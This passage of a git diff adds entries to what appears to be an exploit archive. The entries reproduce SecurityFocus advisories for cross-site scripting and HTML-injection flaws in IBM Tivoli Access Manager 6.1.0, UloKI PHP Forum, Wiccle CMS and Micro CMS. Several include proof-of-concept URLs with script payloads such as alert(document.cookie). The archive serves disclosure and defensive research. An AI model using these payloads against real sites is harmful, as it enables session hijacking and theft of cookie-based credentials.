sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/domain?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34910.txt b/platforms/multiple/webapps/34910.txt new file mode 100755 index 000000000..c9ff7d08f --- /dev/null +++ b/platforms/multiple/webapps/34910.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/group?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34911.txt b/platforms/multiple/webapps/34911.txt new file mode 100755 index 000000000..20754078e --- /dev/null +++ b/platforms/multiple/webapps/34911.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/gso?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34912.txt b/platforms/multiple/webapps/34912.txt new file mode 100755 index 000000000..a480802db --- /dev/null +++ b/platforms/multiple/webapps/34912.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/gsogroup?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34913.txt b/platforms/multiple/webapps/34913.txt new file mode 100755 index 000000000..b4b587c4d --- /dev/null +++ b/platforms/multiple/webapps/34913.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/os?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34914.txt b/platforms/multiple/webapps/34914.txt new file mode 100755 index 000000000..3b770b3ee --- /dev/null +++ b/platforms/multiple/webapps/34914.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/pop?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34915.txt b/platforms/multiple/webapps/34915.txt new file mode 100755 index 000000000..b4c779edc --- /dev/null +++ b/platforms/multiple/webapps/34915.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/rule?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34916.txt b/platforms/multiple/webapps/34916.txt new file mode 100755 index 000000000..1a5f27f3a --- /dev/null +++ b/platforms/multiple/webapps/34916.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/user?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34917.txt b/platforms/multiple/webapps/34917.txt new file mode 100755 index 000000000..942be9fe6 --- /dev/null +++ b/platforms/multiple/webapps/34917.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44382/info + +IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable + +http://www.example.com/ibm/wpm/webseal?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34888.html b/platforms/php/webapps/34888.html deleted file mode 100755 index e3ff942a8..000000000 --- a/platforms/php/webapps/34888.html +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/44255/info - -sNews is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. - -Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. - -sNews 1.7 is vulnerable; other versions may also be affected. - -
\ No newline at end of file diff --git a/platforms/php/webapps/34888.txt b/platforms/php/webapps/34888.txt new file mode 100755 index 000000000..bfe9c0160 --- /dev/null +++ b/platforms/php/webapps/34888.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44273/info + +UloKI PHP Forum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. +http://www.example.com/forum/search.php?term="><script>alert(document.cookie);</script> +UloKI PHP Forum 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/forum/search.php?term="><script>alert(document.cookie);</script> diff --git a/platforms/php/webapps/34890.txt b/platforms/php/webapps/34890.txt new file mode 100755 index 000000000..24de58be0 --- /dev/null +++ b/platforms/php/webapps/34890.txt @@ -0,0 +1,49 @@ +source: http://www.securityfocus.com/bid/44295/info + +Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wwb_101/index.php?module=articles&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=articles&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=blogs&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=blogs&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=gallery&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=gallery&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=news&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=news&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=store&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=video&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=video&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=links&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?module=links&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=events&show=post_search&post_text= + +http://www.example.com/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=downloads&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=guestbook&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=help&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=notebox&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=polls&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=portfolio&show=post_search&post_text= + +http://www.example.com/wwb_101/index.php?module=support&show=post_search&post_text= \ No newline at end of file diff --git a/platforms/php/webapps/34891.txt b/platforms/php/webapps/34891.txt new file mode 100755 index 000000000..3bae74a99 --- /dev/null +++ b/platforms/php/webapps/34891.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/44300/info + +Micro CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Micro CMS 1.0 beta 1 is vulnerable; other versions may also be affected. + +